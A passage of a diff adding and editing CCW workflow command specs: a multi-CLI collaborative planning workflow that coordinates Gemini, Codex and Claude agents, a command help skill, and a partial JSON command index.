console.log(`### Consensus\n${analysis.consensus.map(c => `- ${c}`).join('\n')}\n### Divergences\n${analysis.divergences.map(d => `- ${d}`).join('\n')}`)
break
case 'sequential':
console.log(`### Evolution\n${analysis.evolution.map(e => `**Step ${e.step}**: ${e.analysis.summary}`).join('\n')}\n### Final\n${analysis.finalAnalysis.summary}`)
break
case 'collaborative':
console.log(`### Rounds\n${Object.entries(analysis.rounds).map(([r, a]) => `**Round ${r}**: ${a.map(x => x.cli).join(' + ')}`).join('\n')}\n### Synthesis\n${analysis.synthesis}`)
break
case 'debate':
console.log(`### Debate\n**Proposal**: ${analysis.proposal.summary}\n**Challenges**: ${analysis.challenges.points?.length || 0} points\n**Resolution**: ${analysis.resolution.summary}\n**Confidence**: ${analysis.confidence}%`)
break
case 'challenge':
console.log(`### Challenge\n**Original**: ${analysis.originalAnalysis.summary}\n**Critiques**: ${analysis.critiques.length} issues\n${analysis.critiques.map(c => `- [${c.severity}] ${c.description}`).join('\n')}\n**Risk Score**: ${analysis.riskScore}/100`)
break
}
}
AskUserQuestion({
questions: [{
question: "How to proceed?",
header: "Next Step",
options: [
{ label: "Execute directly", description: "Implement immediately" },
{ label: "Refine analysis", description: "Add constraints, re-analyze" },
{ label: "Change tools", description: "Different tool combination" },
{ label: "Cancel", description: "End workflow" }
],
multiSelect: false
}]
})
// Routing: Execute → Phase 5 | Refine → Phase 3 | Change → Phase 2 | Cancel → End
```
## Phase 5: Direct Execution
```javascript
// No IMPL_PLAN.md, no plan.json - direct implementation
const executionAgents = agents.filter(a => a.canExecute)
const executionTool = selectedAgent.canExecute ? selectedAgent : selectedCLIs[0]
if (executionTool.type === 'agent') {
Task({
subagent_type: executionTool.name,
run_in_background: false,
description: `Execute: ${taskDescription.slice(0, 30)}`,
prompt: `## Task\n${taskDescription}\n\n## Analysis Results\n${JSON.stringify(aggregatedAnalysis, null, 2)}\n\n## Instructions\n1. Apply changes to identified files\n2. Follow recommended approach\n3. Handle identified risks\n4. Verify changes work correctly`
})
} else {
Bash({
command: `ccw cli -p "
PURPOSE: Implement solution: ${taskDescription}
TASK: ${extractedTasks.join(' • ')}
MODE: write
CONTEXT: @${affectedFiles.join(' @')}
EXPECTED: Working implementation with all changes applied
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/write-protocol.md)
" --tool ${executionTool.name} --mode write`,
run_in_background: false
})
}
```
## TodoWrite Structure
```javascript
TodoWrite({ todos: [
{ content: "Phase 1: Clarify requirements", status: "in_progress", activeForm: "Clarifying requirements" },
{ content: "Phase 2: Select tools", status: "pending", activeForm: "Selecting tools" },
{ content: "Phase 3: Multi-mode analysis", status: "pending", activeForm: "Running analysis" },
{ content: "Phase 4: User decision", status: "pending", activeForm: "Awaiting decision" },
{ content: "Phase 5: Direct execution", status: "pending", activeForm: "Executing" }
]})
```
## Iteration Patterns
| Pattern | Flow |
|---------|------|
| **Direct** | Phase 1 → 2 → 3 → 4(execute) → 5 |
| **Refinement** | Phase 3 → 4(refine) → 3 → 4 → 5 |
| **Tool Adjust** | Phase 2(adjust) → 3 → 4 → 5 |
## Error Handling
| Error | Resolution |
|-------|------------|
| CLI timeout | Retry with secondary model |
| No enabled tools | Ask user to enable tools in cli-tools.json |
| Task unclear | Default to first CLI + code-developer |
| Ambiguous task | Force clarification via AskUser |
| Execution fails | Present error, ask user for direction |
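The "retry with secondary model" resolution can be sketched as a wrapper around the CLI executor. The `secondaryModel` field and the injected `exec` parameter are assumptions for illustration, not part of the documented API:

```javascript
// Hypothetical timeout handling: retry a failed CLI call once with a
// secondary model before surfacing the error. The executor is injected
// so the real execCLI (not shown here) can be passed in.
async function execWithRetry(exec, cli, prompt, opts = {}) {
  try {
    return await exec(cli, prompt, opts)
  } catch (err) {
    if (!cli.secondaryModel) throw err
    // Swap in the secondary model and retry exactly once
    return await exec({ ...cli, model: cli.secondaryModel }, prompt, opts)
  }
}
```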
## Comparison with multi-cli-plan
| Aspect | lite-lite-lite | multi-cli-plan |
|--------|----------------|----------------|
| **Artifacts** | None | IMPL_PLAN.md, plan.json, synthesis.json |
| **Session** | Stateless (--resume chaining) | Persistent session folder |
| **Tool Selection** | 3-step (CLI → Mode → Agent) | Config-driven fixed tools |
| **Analysis Modes** | 5 modes with --resume | Fixed synthesis rounds |
| **Best For** | Quick analysis, adversarial validation | Complex multi-step implementations |
## Post-Completion Expansion
After completion, ask the user whether to expand the work into issues (test/enhance/refactor/doc); each selected dimension invokes `/issue:new "{summary} - {dimension}"`.
## Related Commands
```bash
/workflow:multi-cli-plan "complex task" # Full planning workflow
/workflow:lite-plan "task" # Single CLI planning
/workflow:lite-execute --in-memory # Direct execution
```


@@ -0,0 +1,510 @@
---
name: workflow:multi-cli-plan
description: Multi-CLI collaborative planning workflow with ACE context gathering and iterative cross-verification. Uses cli-discuss-agent for Gemini+Codex+Claude analysis to converge on optimal execution plan.
argument-hint: "<task description> [--max-rounds=3] [--tools=gemini,codex] [--mode=parallel|serial]"
allowed-tools: TodoWrite(*), Task(*), AskUserQuestion(*), Read(*), Bash(*), Write(*), mcp__ace-tool__search_context(*)
---
# Multi-CLI Collaborative Planning Command
## Quick Start
```bash
# Basic usage
/workflow:multi-cli-plan "Implement user authentication"
# With options
/workflow:multi-cli-plan "Add dark mode support" --max-rounds=3
/workflow:multi-cli-plan "Refactor payment module" --tools=gemini,codex,claude
/workflow:multi-cli-plan "Fix memory leak" --mode=serial
# Resume session
/workflow:lite-execute --session=MCP-xxx
```
**Context Source**: ACE semantic search + Multi-CLI analysis
**Output Directory**: `.workflow/.multi-cli-plan/{session-id}/`
**Default Max Rounds**: 3 (convergence may complete earlier)
**CLI Tools**: @cli-discuss-agent (analysis), @cli-lite-planning-agent (plan generation)
## What & Why
### Core Concept
Multi-CLI collaborative planning with **three-phase architecture**: ACE context gathering → Iterative multi-CLI discussion → Plan generation. Orchestrator delegates analysis to agents, only handles user decisions and session management.
**Process**:
- **Phase 1**: ACE semantic search gathers codebase context
- **Phase 2**: cli-discuss-agent orchestrates Gemini/Codex/Claude for cross-verified analysis
- **Phase 3-5**: User decision → Plan generation → Execution handoff
**vs Single-CLI Planning**:
- **Single**: One model perspective, potential blind spots
- **Multi-CLI**: Cross-verification catches inconsistencies, builds consensus on solutions
### Value Proposition
1. **Multi-Perspective Analysis**: Gemini + Codex + Claude analyze from different angles
2. **Cross-Verification**: Identify agreements/disagreements, build confidence
3. **User-Driven Decisions**: Every round ends with user decision point
4. **Iterative Convergence**: Progressive refinement until consensus reached
### Orchestrator Boundary (CRITICAL)
- **ONLY command** for multi-CLI collaborative planning
- Manages: Session state, user decisions, agent delegation, phase transitions
- Delegates: CLI execution to @cli-discuss-agent, plan generation to @cli-lite-planning-agent
### Execution Flow
```
Phase 1: Context Gathering
└─ ACE semantic search, extract keywords, build context package
Phase 2: Multi-CLI Discussion (Iterative, via @cli-discuss-agent)
├─ Round N: Agent executes Gemini + Codex + Claude
├─ Cross-verify findings, synthesize solutions
├─ Write synthesis.json to rounds/{N}/
└─ Loop until convergence or max rounds
Phase 3: Present Options
└─ Display solutions with trade-offs from agent output
Phase 4: User Decision
├─ Approve solution → Phase 5
├─ Need clarification → Return to Phase 2
└─ Change direction → Reset with feedback
Phase 5: Plan Generation (via @cli-lite-planning-agent)
├─ Generate IMPL_PLAN.md + plan.json
└─ Hand off to /workflow:lite-execute
```
### Agent Roles
| Agent | Responsibility |
|-------|---------------|
| **Orchestrator** | Session management, ACE context, user decisions, phase transitions |
| **@cli-discuss-agent** | Multi-CLI execution (Gemini/Codex/Claude), cross-verification, solution synthesis, synthesis.json output |
| **@cli-lite-planning-agent** | Task decomposition, IMPL_PLAN.md + plan.json generation |
## Core Responsibilities
### Phase 1: Context Gathering
**Session Initialization**:
```javascript
const sessionId = `MCP-${taskSlug}-${date}`
const sessionFolder = `.workflow/.multi-cli-plan/${sessionId}`
Bash(`mkdir -p ${sessionFolder}/rounds`)
```
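The `taskSlug` and `date` components are assumed inputs here; a hypothetical derivation (not the documented implementation) could be:

```javascript
// Hypothetical session-ID derivation, e.g. MCP-refactor-payment-2026-01-14
function makeSessionId(taskDescription, now = new Date()) {
  const taskSlug = taskDescription
    .toLowerCase()
    .replace(/[^a-z0-9]+/g, '-')      // collapse non-alphanumerics to hyphens
    .replace(/^-|-$/g, '')            // trim edge hyphens
    .split('-').slice(0, 4).join('-') // keep the slug short
  const date = now.toISOString().slice(0, 10) // YYYY-MM-DD
  return `MCP-${taskSlug}-${date}`
}
```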
**ACE Context Queries**:
```javascript
const aceQueries = [
`Project architecture related to ${keywords}`,
`Existing implementations of ${keywords[0]}`,
`Code patterns for ${keywords} features`,
`Integration points for ${keywords[0]}`
]
// Execute via mcp__ace-tool__search_context
```
**Context Package** (passed to agent):
- `relevant_files[]` - Files identified by ACE
- `detected_patterns[]` - Code patterns found
- `architecture_insights` - Structure understanding
### Phase 2: Agent Delegation
**Core Principle**: Orchestrator only delegates and reads output - NO direct CLI execution.
**Agent Invocation**:
```javascript
Task({
subagent_type: "cli-discuss-agent",
run_in_background: false,
description: `Discussion round ${currentRound}`,
prompt: `
## Input Context
- task_description: ${taskDescription}
- round_number: ${currentRound}
- session: { id: "${sessionId}", folder: "${sessionFolder}" }
- ace_context: ${JSON.stringify(contextPackage)}
- previous_rounds: ${JSON.stringify(analysisResults)}
- user_feedback: ${userFeedback || 'None'}
- cli_config: { tools: ["gemini", "codex"], mode: "parallel", fallback_chain: ["gemini", "codex", "claude"] }
## Execution Process
1. Parse input context (handle JSON strings)
2. Check if ACE supplementary search needed
3. Build CLI prompts with context
4. Execute CLIs (parallel or serial per cli_config.mode)
5. Parse CLI outputs, handle failures with fallback
6. Perform cross-verification between CLI results
7. Synthesize solutions, calculate scores
8. Calculate convergence, generate clarification questions
9. Write synthesis.json
## Output
Write: ${sessionFolder}/rounds/${currentRound}/synthesis.json
## Completion Checklist
- [ ] All configured CLI tools executed (or fallback triggered)
- [ ] Cross-verification completed with agreements/disagreements
- [ ] 2-3 solutions generated with file:line references
- [ ] Convergence score calculated (0.0-1.0)
- [ ] synthesis.json written with all Primary Fields
`
})
```
**Read Agent Output**:
```javascript
const synthesis = JSON.parse(Read(`${sessionFolder}/rounds/${round}/synthesis.json`))
// Access top-level fields: solutions, convergence, cross_verification, clarification_questions
```
**Convergence Decision**:
```javascript
if (synthesis.convergence.recommendation === 'converged') {
// Proceed to Phase 3
} else if (synthesis.convergence.recommendation === 'user_input_needed') {
// Collect user feedback, return to Phase 2
} else {
// Continue to next round if new_insights && round < maxRounds
}
```
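How the agent computes `convergence.score` is internal to cli-discuss-agent; one plausible sketch (an assumption, not the documented algorithm) scores the overlap between solution sets of consecutive rounds:

```javascript
// Hypothetical convergence metric: Jaccard similarity between the
// solution names proposed in two consecutive rounds. A score near 1.0
// means the rounds converged on the same solutions.
function convergenceScore(prevSolutions, currSolutions) {
  const prev = new Set(prevSolutions.map(s => s.name.toLowerCase()))
  const curr = new Set(currSolutions.map(s => s.name.toLowerCase()))
  const intersection = [...curr].filter(n => prev.has(n)).length
  const union = new Set([...prev, ...curr]).size
  return union === 0 ? 0 : intersection / union
}
```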
### Phase 3: Present Options
**Display from Agent Output** (no processing):
```javascript
console.log(`
## Solution Options
${synthesis.solutions.map((s, i) => `
**Option ${i+1}: ${s.name}**
Source: ${s.source_cli.join(' + ')}
Effort: ${s.effort} | Risk: ${s.risk}
Pros: ${s.pros.join(', ')}
Cons: ${s.cons.join(', ')}
Files: ${s.affected_files.slice(0,3).map(f => `${f.file}:${f.line}`).join(', ')}
`).join('\n')}
## Cross-Verification
Agreements: ${synthesis.cross_verification.agreements.length}
Disagreements: ${synthesis.cross_verification.disagreements.length}
`)
```
### Phase 4: User Decision
**Decision Options**:
```javascript
AskUserQuestion({
questions: [{
question: "Which solution approach?",
header: "Solution",
options: solutions.map((s, i) => ({
label: `Option ${i+1}: ${s.name}`,
description: `${s.effort} effort, ${s.risk} risk`
})).concat([
{ label: "Need More Analysis", description: "Return to Phase 2" }
])
}]
})
```
**Routing**:
- Approve → Phase 5
- Need More Analysis → Phase 2 with feedback
- Add constraints → Collect details, then Phase 5
### Phase 5: Plan Generation
**Step 1: Build Context-Package** (Orchestrator responsibility):
```javascript
// Extract key information from user decision and synthesis
const contextPackage = {
// Core solution details
solution: {
name: selectedSolution.name,
source_cli: selectedSolution.source_cli,
feasibility: selectedSolution.feasibility,
effort: selectedSolution.effort,
risk: selectedSolution.risk,
summary: selectedSolution.summary
},
// Implementation plan (tasks, flow, milestones)
implementation_plan: selectedSolution.implementation_plan,
// Dependencies
dependencies: selectedSolution.dependencies || { internal: [], external: [] },
// Technical concerns
technical_concerns: selectedSolution.technical_concerns || [],
// Consensus from cross-verification
consensus: {
agreements: synthesis.cross_verification.agreements,
resolved_conflicts: synthesis.cross_verification.resolution
},
// User constraints (from Phase 4 feedback)
constraints: userConstraints || [],
// Task context
task_description: taskDescription,
session_id: sessionId
}
// Write context-package for traceability
Write(`${sessionFolder}/context-package.json`, JSON.stringify(contextPackage, null, 2))
```
**Context-Package Schema**:
| Field | Type | Description |
|-------|------|-------------|
| `solution` | object | User-selected solution from synthesis |
| `solution.name` | string | Solution identifier |
| `solution.feasibility` | number | Viability score (0-1) |
| `solution.summary` | string | Brief analysis summary |
| `implementation_plan` | object | Task breakdown with flow and dependencies |
| `implementation_plan.approach` | string | High-level technical strategy |
| `implementation_plan.tasks[]` | array | Discrete tasks with id, name, depends_on, files |
| `implementation_plan.execution_flow` | string | Task sequence (e.g., "T1 → T2 → T3") |
| `implementation_plan.milestones` | string[] | Key checkpoints |
| `dependencies` | object | Module and package dependencies |
| `technical_concerns` | string[] | Risks and blockers |
| `consensus` | object | Cross-verified agreements from multi-CLI |
| `constraints` | string[] | User-specified constraints from Phase 4 |
```json
{
"solution": {
"name": "Strategy Pattern Refactoring",
"source_cli": ["gemini", "codex"],
"feasibility": 0.88,
"effort": "medium",
"risk": "low",
"summary": "Extract payment gateway interface, implement strategy pattern for multi-gateway support"
},
"implementation_plan": {
"approach": "Define interface → Create concrete strategies → Implement factory → Migrate existing code",
"tasks": [
{"id": "T1", "name": "Define PaymentGateway interface", "depends_on": [], "files": [{"file": "src/types/payment.ts", "line": 1, "action": "create"}], "key_point": "Include all existing Stripe methods"},
{"id": "T2", "name": "Implement StripeGateway", "depends_on": ["T1"], "files": [{"file": "src/payment/stripe.ts", "line": 1, "action": "create"}], "key_point": "Wrap existing logic"},
{"id": "T3", "name": "Create GatewayFactory", "depends_on": ["T1"], "files": [{"file": "src/payment/factory.ts", "line": 1, "action": "create"}], "key_point": null},
{"id": "T4", "name": "Migrate processor to use factory", "depends_on": ["T2", "T3"], "files": [{"file": "src/payment/processor.ts", "line": 45, "action": "modify"}], "key_point": "Backward compatible"}
],
"execution_flow": "T1 → (T2 | T3) → T4",
"milestones": ["Interface defined", "Gateway implementations complete", "Migration done"]
},
"dependencies": {
"internal": ["@/lib/payment-gateway", "@/types/payment"],
"external": ["stripe@^14.0.0"]
},
"technical_concerns": ["Existing tests must pass", "No breaking API changes"],
"consensus": {
"agreements": ["Use strategy pattern", "Keep existing API"],
"resolved_conflicts": "Factory over DI for simpler integration"
},
"constraints": ["backward compatible", "no breaking changes to PaymentResult type"],
"task_description": "Refactor payment processing for multi-gateway support",
"session_id": "MCP-payment-refactor-2026-01-14"
}
```
**Step 2: Invoke Planning Agent**:
```javascript
Task({
subagent_type: "cli-lite-planning-agent",
run_in_background: false,
description: "Generate implementation plan",
prompt: `
## Schema Reference
Execute: cat ~/.claude/workflows/cli-templates/schemas/plan-json-schema.json
## Context-Package (from orchestrator)
${JSON.stringify(contextPackage, null, 2)}
## Execution Process
1. Read plan-json-schema.json for output structure
2. Read project-tech.json and project-guidelines.json
3. Parse context-package fields:
- solution: name, feasibility, summary
- implementation_plan: tasks[], execution_flow, milestones
- dependencies: internal[], external[]
- technical_concerns: risks/blockers
- consensus: agreements, resolved_conflicts
- constraints: user requirements
4. Use implementation_plan.tasks[] as task foundation
5. Preserve task dependencies (depends_on) and execution_flow
6. Expand tasks with detailed acceptance criteria
7. Generate IMPL_PLAN.md documenting milestones and key_points
8. Generate plan.json following schema exactly
## Output
- ${sessionFolder}/IMPL_PLAN.md
- ${sessionFolder}/plan.json
## Completion Checklist
- [ ] IMPL_PLAN.md documents approach, milestones, technical_concerns
- [ ] plan.json preserves task dependencies from implementation_plan
- [ ] Task execution order follows execution_flow
- [ ] Key_points reflected in task descriptions
- [ ] User constraints applied to implementation
- [ ] Acceptance criteria are testable
`
})
```
**Hand off to Execution**:
```javascript
if (userConfirms) {
SlashCommand("/workflow:lite-execute --in-memory")
}
```
## Output File Structure
```
.workflow/.multi-cli-plan/{MCP-task-slug-YYYY-MM-DD}/
├── session-state.json # Session tracking (orchestrator)
├── rounds/
│ ├── 1/synthesis.json # Round 1 analysis (cli-discuss-agent)
│ ├── 2/synthesis.json # Round 2 analysis (cli-discuss-agent)
│ └── .../
├── context-package.json # Extracted context for planning (orchestrator)
├── IMPL_PLAN.md # Documentation (cli-lite-planning-agent)
└── plan.json # Structured plan (cli-lite-planning-agent)
```
**File Producers**:
| File | Producer | Content |
|------|----------|---------|
| `session-state.json` | Orchestrator | Session metadata, rounds, decisions |
| `rounds/*/synthesis.json` | cli-discuss-agent | Solutions, convergence, cross-verification |
| `context-package.json` | Orchestrator | Extracted solution, dependencies, consensus for planning |
| `IMPL_PLAN.md` | cli-lite-planning-agent | Human-readable plan |
| `plan.json` | cli-lite-planning-agent | Structured tasks for execution |
## synthesis.json Schema
```json
{
"round": 1,
"solutions": [{
"name": "Solution Name",
"source_cli": ["gemini", "codex"],
"feasibility": 0.85,
"effort": "low|medium|high",
"risk": "low|medium|high",
"summary": "Brief analysis summary",
"implementation_plan": {
"approach": "High-level technical approach",
"tasks": [
{"id": "T1", "name": "Task", "depends_on": [], "files": [], "key_point": "..."}
],
"execution_flow": "T1 → T2 → T3",
"milestones": ["Checkpoint 1", "Checkpoint 2"]
},
"dependencies": {"internal": [], "external": []},
"technical_concerns": ["Risk 1", "Blocker 2"]
}],
"convergence": {
"score": 0.85,
"new_insights": false,
"recommendation": "converged|continue|user_input_needed"
},
"cross_verification": {
"agreements": [],
"disagreements": [],
"resolution": "..."
},
"clarification_questions": []
}
```
**Key Planning Fields**:
| Field | Purpose |
|-------|---------|
| `feasibility` | Viability score (0-1) |
| `implementation_plan.tasks[]` | Discrete tasks with dependencies |
| `implementation_plan.execution_flow` | Task sequence visualization |
| `implementation_plan.milestones` | Key checkpoints |
| `technical_concerns` | Risks and blockers |
**Note**: Solutions ranked by internal scoring (array order = priority)
## TodoWrite Structure
**Initialization**:
```javascript
TodoWrite({ todos: [
{ content: "Phase 1: Context Gathering", status: "in_progress", activeForm: "Gathering context" },
{ content: "Phase 2: Multi-CLI Discussion", status: "pending", activeForm: "Running discussion" },
{ content: "Phase 3: Present Options", status: "pending", activeForm: "Presenting options" },
{ content: "Phase 4: User Decision", status: "pending", activeForm: "Awaiting decision" },
{ content: "Phase 5: Plan Generation", status: "pending", activeForm: "Generating plan" }
]})
```
**During Discussion Rounds**:
```javascript
TodoWrite({ todos: [
{ content: "Phase 1: Context Gathering", status: "completed", activeForm: "Gathering context" },
{ content: "Phase 2: Multi-CLI Discussion", status: "in_progress", activeForm: "Running discussion" },
{ content: " → Round 1: Initial analysis", status: "completed", activeForm: "Analyzing" },
{ content: " → Round 2: Deep verification", status: "in_progress", activeForm: "Verifying" },
{ content: "Phase 3: Present Options", status: "pending", activeForm: "Presenting options" },
// ...
]})
```
## Error Handling
| Error | Resolution |
|-------|------------|
| ACE search fails | Fall back to Glob/Grep for file discovery |
| Agent fails | Retry once, then present partial results |
| CLI timeout (in agent) | Agent uses fallback: gemini → codex → claude |
| No convergence | Present best options, flag uncertainty |
| synthesis.json parse error | Request agent retry |
| User cancels | Save session for later resumption |
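The fallback chain the agent applies on CLI timeout (gemini → codex → claude, per `cli_config.fallback_chain`) can be sketched as follows; `runTool` is a hypothetical injected executor:

```javascript
// Hypothetical fallback execution: try each tool in order until one
// succeeds, collecting errors so the final failure is diagnosable.
async function execWithFallback(runTool, chain, prompt) {
  const errors = []
  for (const tool of chain) {
    try {
      return { tool, output: await runTool(tool, prompt) }
    } catch (err) {
      errors.push({ tool, error: String(err) })
    }
  }
  throw new Error(`All tools failed: ${errors.map(e => e.tool).join(', ')}`)
}
```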
## Configuration
| Flag | Default | Description |
|------|---------|-------------|
| `--max-rounds` | 3 | Maximum discussion rounds |
| `--tools` | gemini,codex | CLI tools for analysis |
| `--mode` | parallel | Execution mode: parallel or serial |
| `--auto-execute` | false | Auto-execute after approval |
## Best Practices
1. **Be Specific**: Detailed task descriptions improve ACE context quality
2. **Provide Feedback**: Use clarification rounds to refine requirements
3. **Trust Cross-Verification**: Multi-CLI consensus indicates high confidence
4. **Review Trade-offs**: Consider pros/cons before selecting solution
5. **Check synthesis.json**: Review agent output for detailed analysis
6. **Iterate When Needed**: Don't hesitate to request more analysis
## Related Commands
```bash
# Resume saved session
/workflow:lite-execute --session=MCP-xxx
# Simpler single-round planning
/workflow:lite-plan "task description"
# Issue-driven discovery
/issue:discover-by-prompt "find issues"
# View session files
cat .workflow/.multi-cli-plan/{session-id}/IMPL_PLAN.md
cat .workflow/.multi-cli-plan/{session-id}/rounds/1/synthesis.json
```


@@ -585,6 +585,10 @@ TodoWrite({
- Mark completed immediately after each group finishes
- Update parent phase status when all child items complete
## Post-Completion Expansion
After completion, ask the user whether to expand the work into issues (test/enhance/refactor/doc); each selected dimension invokes `/issue:new "{summary} - {dimension}"`.
## Best Practices
1. **Trust AI Planning**: Planning agent's grouping and execution strategy are based on dependency analysis


@@ -491,6 +491,10 @@ The orchestrator automatically creates git commits at key checkpoints to enable
**Note**: Final session completion creates additional commit with full summary.
## Post-Completion Expansion
After completion, ask the user whether to expand the work into issues (test/enhance/refactor/doc); each selected dimension invokes `/issue:new "{summary} - {dimension}"`.
## Best Practices
1. **Default Settings Work**: 10 iterations sufficient for most cases


@@ -1,139 +1,86 @@
---
name: ccw-help
description: CCW command help system. Search, browse, recommend commands. Triggers "ccw-help", "ccw-issue".
allowed-tools: Read, Grep, Glob, AskUserQuestion
version: 7.0.0
---
# CCW-Help Skill
CCW command help system providing command search, recommendations, and documentation lookup.
## Trigger Conditions
- Keywords: "ccw-help", "ccw-issue", "帮助", "命令", "怎么用"
- Scenarios: asking about command usage, searching for commands, requesting next-step suggestions
## Operation Modes
### Mode 1: Command Search
**Triggers**: "搜索命令", "find command", "search"
**Process**:
1. Query the `command.json` commands array
2. Filter by name, description, category
3. Present the top 3-5 relevant commands
### Mode 2: Smart Recommendations
**Triggers**: "下一步", "what's next", "推荐"
**Process**:
1. Query the command's `flow.next_steps` in `command.json`
2. Explain WHY each recommendation fits
### Mode 3: Documentation
**Triggers**: "怎么用", "how to use", "详情"
**Process**:
1. Locate the command in `command.json`
2. Read the source file via its `source` path
3. Provide context-specific examples
### Mode 4: Beginner Onboarding
**Triggers**: "新手", "getting started", "常用命令"
**Process**:
1. Query the `essential_commands` array
2. Guide the user to the appropriate workflow entry point
### Mode 5: Issue Reporting
**Triggers**: "ccw-issue", "报告 bug"
**Process**:
1. Use AskUserQuestion to gather context
2. Generate structured issue template
3. Provide actionable next steps
## Data Source
Single source of truth: **[command.json](command.json)**
| Field | Purpose |
|-------|---------|
| `commands[]` | Flat command list with metadata |
| `commands[].flow` | Relationships (next_steps, prerequisites) |
| `commands[].essential` | Essential flag for onboarding |
| `agents[]` | Agent directory |
| `essential_commands[]` | Core commands list |
### Source Path Format
The `source` field is a relative path (from the `skills/ccw-help/` directory):
```json
{
"name": "lite-plan",
"source": "../../../commands/workflow/lite-plan.md"
}
```
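A lookup against `command.json` for search and next-step recommendation might be sketched as follows (the `findCommand`/`nextSteps` names are hypothetical; field names follow the index schema above):

```javascript
// Hypothetical queries over the unified command.json index.
function findCommand(index, query) {
  const q = query.toLowerCase()
  // Match against name or description, mirroring Mode 1's filter step
  return index.commands.filter(c =>
    c.name.includes(q) || c.description.toLowerCase().includes(q)
  )
}

function nextSteps(index, name) {
  // Mode 2: recommendations come straight from the command's flow field
  const cmd = index.commands.find(c => c.name === name)
  return cmd?.flow?.next_steps || []
}
```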
## Configuration
| Parameter | Default | Description |
|------|--------|------|
| max_results | 5 | Maximum number of search results returned |
| show_source | true | Whether to show source file paths |
## CLI Integration
| Scenario | CLI Hint | Purpose |
|------|----------|------|
| Complex queries | `gemini --mode analysis` | Multi-file analysis and comparison |
| Doc generation | - | Read source files directly |
## Slash Commands
```bash
@@ -145,33 +92,25 @@ CCW-Help 使用 JSON 索引实现快速查询(无 reference 文件夹,直接
## Maintenance
### Update Index
```bash
cd D:/Claude_dms3/.claude/skills/ccw-help
python scripts/analyze_commands.py
```
The script scans the `commands/` and `agents/` directories and regenerates the unified `command.json` index.
## Statistics
- **Commands**: 88+
- **Agents**: 16
- **Essential**: 10 core commands
## Core Principle
**Intelligent synthesis, not template copying**
- Understand the user's specific situation
- Synthesize information from multiple sources
- Tailor examples and explanations


@@ -0,0 +1,511 @@
{
"_metadata": {
"version": "2.0.0",
"total_commands": 88,
"total_agents": 16,
"description": "Unified CCW-Help command index"
},
"essential_commands": [
"/workflow:lite-plan",
"/workflow:lite-fix",
"/workflow:plan",
"/workflow:execute",
"/workflow:session:start",
"/workflow:review-session-cycle",
"/memory:docs",
"/workflow:brainstorm:artifacts",
"/workflow:action-plan-verify",
"/version"
],
"commands": [
{
"name": "lite-plan",
"command": "/workflow:lite-plan",
"description": "Lightweight interactive planning with in-memory plan, dispatches to lite-execute",
"arguments": "[-e|--explore] \"task\"|file.md",
"category": "workflow",
"difficulty": "Intermediate",
"essential": true,
"flow": {
"next_steps": ["/workflow:lite-execute"],
"alternatives": ["/workflow:plan"]
},
"source": "../../../commands/workflow/lite-plan.md"
},
{
"name": "lite-execute",
"command": "/workflow:lite-execute",
"description": "Execute based on in-memory plan or prompt",
"arguments": "[--in-memory] \"task\"|file-path",
"category": "workflow",
"difficulty": "Intermediate",
"flow": {
"prerequisites": ["/workflow:lite-plan", "/workflow:lite-fix"]
},
"source": "../../../commands/workflow/lite-execute.md"
},
{
"name": "lite-fix",
"command": "/workflow:lite-fix",
"description": "Lightweight bug diagnosis and fix with optional hotfix mode",
"arguments": "[--hotfix] \"bug description\"",
"category": "workflow",
"difficulty": "Intermediate",
"essential": true,
"flow": {
"next_steps": ["/workflow:lite-execute"],
"alternatives": ["/workflow:lite-plan"]
},
"source": "../../../commands/workflow/lite-fix.md"
},
{
"name": "plan",
"command": "/workflow:plan",
"description": "5-phase planning with task JSON generation",
"arguments": "\"description\"|file.md",
"category": "workflow",
"difficulty": "Intermediate",
"essential": true,
"flow": {
"next_steps": ["/workflow:action-plan-verify", "/workflow:execute"],
"alternatives": ["/workflow:tdd-plan"]
},
"source": "../../../commands/workflow/plan.md"
},
{
"name": "execute",
"command": "/workflow:execute",
"description": "Coordinate agent execution with DAG parallel processing",
"arguments": "[--resume-session=\"session-id\"]",
"category": "workflow",
"difficulty": "Intermediate",
"essential": true,
"flow": {
"prerequisites": ["/workflow:plan", "/workflow:tdd-plan"],
"next_steps": ["/workflow:review"]
},
"source": "../../../commands/workflow/execute.md"
},
{
"name": "action-plan-verify",
"command": "/workflow:action-plan-verify",
"description": "Cross-artifact consistency analysis",
"arguments": "[--session session-id]",
"category": "workflow",
"difficulty": "Intermediate",
"essential": true,
"flow": {
"prerequisites": ["/workflow:plan"],
"next_steps": ["/workflow:execute"]
},
"source": "../../../commands/workflow/action-plan-verify.md"
},
{
"name": "init",
"command": "/workflow:init",
"description": "Initialize project-level state",
"arguments": "[--regenerate]",
"category": "workflow",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/init.md"
},
{
"name": "clean",
"command": "/workflow:clean",
"description": "Intelligent code cleanup with stale artifact discovery",
"arguments": "[--dry-run] [\"focus\"]",
"category": "workflow",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/clean.md"
},
{
"name": "debug",
"command": "/workflow:debug",
"description": "Hypothesis-driven debugging with NDJSON logging",
"arguments": "\"bug description\"",
"category": "workflow",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/debug.md"
},
{
"name": "replan",
"command": "/workflow:replan",
"description": "Interactive workflow replanning",
"arguments": "[--session id] [task-id] \"requirements\"",
"category": "workflow",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/replan.md"
},
{
"name": "session:start",
"command": "/workflow:session:start",
"description": "Start or discover workflow sessions",
"arguments": "[--type <workflow|review|tdd>] [--auto|--new]",
"category": "workflow",
"subcategory": "session",
"difficulty": "Intermediate",
"essential": true,
"flow": {
"next_steps": ["/workflow:plan", "/workflow:execute"]
},
"source": "../../../commands/workflow/session/start.md"
},
{
"name": "session:list",
"command": "/workflow:session:list",
"description": "List all workflow sessions",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"difficulty": "Beginner",
"source": "../../../commands/workflow/session/list.md"
},
{
"name": "session:resume",
"command": "/workflow:session:resume",
"description": "Resume paused workflow session",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/resume.md"
},
{
"name": "session:complete",
"command": "/workflow:session:complete",
"description": "Mark session complete and archive",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/complete.md"
},
{
"name": "brainstorm:auto-parallel",
"command": "/workflow:brainstorm:auto-parallel",
"description": "Parallel brainstorming with multi-role analysis",
"arguments": "\"topic\" [--count N]",
"category": "workflow",
"subcategory": "brainstorm",
"difficulty": "Advanced",
"source": "../../../commands/workflow/brainstorm/auto-parallel.md"
},
{
